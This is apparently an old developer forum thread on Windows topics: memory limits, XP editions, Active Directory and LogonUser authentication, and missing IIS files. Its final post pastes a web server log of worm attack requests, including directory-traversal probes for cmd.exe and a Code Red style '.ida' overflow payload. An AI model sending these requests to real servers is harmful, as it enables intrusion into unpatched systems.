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Hello all-
Processes on a windows box have a 4GB memory space, but of this only 2GB is addressible for user data and instructions. The rest is System memory. Windows 2000 Advanced Server can be configured to use upto 3GB for user memory.
The applications that we are porting for our project use a very large amount of memory. Sometimes in the range of 4 GB.
someone might have more information about this limit and any workarounds that might exist for getting access to more of the total memory. Please let us know.
Thanks in advance,
Sarma
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if you have not already been there, please check this page on the MS site..which talks about "Application Memory Tuning" which enables your app to access more than 2GB of memory...
http://www.microsoft.com/windows2000/en/advanced/help/vlm_7.htm
thanks
retZ
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On x86 at least, it's impossible. On 64-bit CPUs (IA64, DEC Alpha) you can use the VLM APIs to access more than 4GB if you have enough physical RAM. Or switch to a Win64 OS. Nothing simple, unfortunately.
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Does anyone know of a good method to check to see if someone has rights to a particular application via Active Directory? I actually have to do a conversion (NT Authentication) at work in VB6 (I know ) and I am looking for a good method to do this. I have seen very little on ADSI, however I think this maybe the way to go but I would just like a little input from anyone who has been involved with something like this. Thanks in advance.
Nick Parker
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I am thinking of buying XP Pro and other than IIS & SMP what is better about XP Pro than XP Home.
- Matt Newman / Windows XP Activist
-Sonork ID: 100.11179
Could you Would you with a goat? - Dr Suess
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Thanks for the link, but I was looking more for user experience.
- Matt Newman / Windows XP Activist
-Sonork ID: 100.11179
Could you Would you with a goat? - Dr Suess
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Matt Newman wrote:
user experience
I can't see the user experience being any different.
I think the only real visual diff. will be the login screen / fast user switching.
Cheers,
Simon
"Every good work of software starts by scratching a developer's personal itch.", Eric S. Raymond
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Ok I worded that wrong, I was wondering if somebody had used both and wondering what was better about Pro than Home
- Matt Newman / Windows XP Activist
-Sonork ID: 100.11179
Could you Would you with a goat? - Dr Suess
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You can't be a member of a domain using XP home, but you can in PRO. This is the reason MS bill Pro as a professional OS.
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Hello,
Do anyone know, whether its possible to install "Windows Xp
(Home/Professional) English version upgrade" over an existing "Windows XP Home edition Deutsch" ?
Thanks,
-Anoop.
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I have a friend (lets call him stupid) somehow corrupted and or lost several files that are needed to install IIS in 2K Pro. He asked me to fix it but he seems to have misplaced his Windows CD (thats why I am calling him stupid) and I do not have Windows 2000. I need 17 files. If someone could email them to me, point me to a download site, or sonork them to me it would be appreciated I need:
infoctrs.ini<br />
inetinfo.exe<br />
logtemp.sql<br />
iisreset.exe<br />
iis.msc<br />
iisperf.pmc<br />
iisrstas.exe<br />
inetmgr.exe<br />
pwstray.exe<br />
pws.exe<br />
axpef.ini<br />
w3ctrs.ini<br />
browscap.ini<br />
fortutil.exe<br />
iissync.exe<br />
ftpctrs.ini<br />
IIS_infoctrs.h
Or if you could get me iis.cab that would be great. Thanks if you can help.
- Matt Newman / Windows XP Activist
-Sonork ID: 100.11179
Could you Would you with a goat? - Dr Suess
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We are moving our Client/Server applications over to Windows Authentication; however I have run into a snag. I have read a few articles showing how to connect to an LDAP Server using Active Directory and ADO, which looks like it implements some sort of SQL like statement to query the database. The problem that I am seeing is that in the From section of the statement you are specifying what looks like a directory path/folder level of sorts. Could someone clear some of this up for me? We would like to require the user to reenter their Windows username and password and validate this is correct before letting them run the application. Please fill me in on any information that you can suggest, I am really stumped here. Thanks in advance.
Nick Parker
Actually, real programmers don't need the enter key- they just type in 00001101."
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"directory path/folder lvel of sorts" is probably the LDAP path under which to preform the requested statment you are passing to ADO. AD and LDAP is quite simple and straight foward. MS designed it to be very fast for reading, but updating (especially in a forest) is slow. MS even provides COM objects for talking with AD through ADSI interfaces. The 2000 Dev Days had a whole track on using AD/ADSI and provided an example for doing something similar.
To validate a user logging in you could bypass using ADSI and just attempt loggin them on in determining if they failed or not. ADSI lets you set and clear passwords but doesn't provide a way for you to log and authenicate a user (that I recall) That is why websites that use NT authenication use NTLM that is available with IE for restricted website access.
If the application you are writing is a windows application that the user runs at their machines you can use the currently logged on use as authentication and limit their access to AD that way, this is what the Dev Days track showed as well as a web example.
Cheers,
-Erik
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My thoughts are my own and reflect on no other.
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Erik,
Thanks for the reply so quickly. The main application that I am working on now holds a lot of sensitive material (i.e. - credit card numbers). If the user we to walk away from their desktop and not lock their computer down, we would have no way of keeping another individual from accessing this information. Do you still feel that something like this could be done, as if it were making the user re-login to Windows, but only point to the application? I wasn't quite sure where you were going with that. Thank you.
Nick Parker
Actually, real programmers don't need the enter key- they just type in 00001101."
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You can make a user "login" for just your app but using LogonUser, this will authenticate them for the domain or workstation.
Cheers,
-Erik
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
My thoughts are my own and reflect on no other.
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Is there a way for me to implement the LogonUser method in VB6? I know that most everyone on here does C++, but I work in a VB shop only. I looked at VBAPI.com, but couldn't find anything on it. Any suggestions, thanks for all the help by the way.
Nick Parker
Actually, real programmers don't need the enter key- they just type in 00001101."
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I think I found something that I can use:
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Private Declare Function LogonUser Lib "Advapi32" _<br />
Alias "LogonUserA" (ByVal lpszUsername As String, _<br />
ByVal lpszDomain As Any, ByVal lpszPassword As String, _<br />
ByVal dwLogonType As Long, ByVal dwLogonProvider As _<br />
Long, phToken As Long) As Long<br />
Thanks again
Nick Parker
Actually, real programmers don't need the enter key- they just type in 00001101."
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Erik,
I have run into a snag with the LogonUser method. Calling LogonUser requires the SE_TCB_NAME privilege according to Microsoft, therefore I would need to apply this property to each/all users. Do you know of any issues related to this property being set, it sounds as if it could be somewhat dangerous to set all users with this property. Thanks again.
Nick Parker
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using registred winXp home ed.
Does the "personalized menu" work ?
I've set them both in internet explorer advanced options and in the start menu properties ( using classic start menu )
Also, I'm francophone, and I usually write emails, and post to billboards in french. is there a way to start outlook and explorer6 and have them use the french ( canada ) keyboard layout automatically, and launch VC++ using the standard english layout ? I'm switching them manually but if I close every iExplorer, I and to reset it manually ...
Also, does the tweakUI for XP worth it ?
Thanks
Max.
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The personalized menu doesn't kick in for a few days. How long have you had it enabled?
TweakUI for XP is well worth the download.
--Mike--
Just released - RightClick-Encrypt - Adds fast & easy file encryption to Explorer
Like the Google toolbar? Then check out UltraBar, with more features & customizable search engines!
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Michael Dunn wrote:
How long have you had it enabled?
for nearly a week now ...
Thanks, I'll keep waiting for it to work ...
Max.
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Could someone please explain it to me. In all Windows before, clicking on a button in the task bar would bring that application to the top. If it were minimized, it would restore it. If it were maximized, it would iconify (win3.1 term) it.
In XP it just turns blue and blinks at you. If I don't figure out what is going on, I will 1) go insane and 2) switch to linux (not impling that you have to be crazy to use linux
Could someone please tell me how to get the old behavior back?
Thanks!
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Hi,
I notice that Windows XP caches authentication credentials when connecting to computers from outside a domain. How can I view this cache, and purge it?
Thanks!
Chris P.
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I look at my PWS log
and all I can find is repeated group of hits like one below
21:44:01 12.228.180.2 GET /scripts/root.exe /c+dir 404
21:44:01 12.228.180.2 GET /MSADC/root.exe /c+dir 404
21:44:01 12.228.180.2 GET /c/winnt/system32/cmd.exe /c+dir 404
21:44:02 12.228.180.2 GET /d/winnt/system32/cmd.exe /c+dir 404
21:44:02 12.228.180.2 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
21:44:04 12.228.180.2 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500
21:44:04 12.228.180.2 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 500
21:44:05 12.228.180.2 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 500
21:44:05 12.228.180.2 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 500
21:44:06 12.228.180.2 GET /scripts/winnt/system32/cmd.exe /c+dir 404
21:44:06 12.228.180.2 GET /winnt/system32/cmd.exe /c+dir 404
21:44:07 12.228.180.2 GET /winnt/system32/cmd.exe /c+dir 404
21:44:07 12.228.180.2 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
21:44:08 12.228.180.2 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
21:44:08 12.228.180.2 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 500
21:44:08 12.228.180.2 GET /scripts/..%2f../winnt/system32/cmd.exe /c+dir 500
22:43:39 80.135.214.20 GET /default.ida NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a 200
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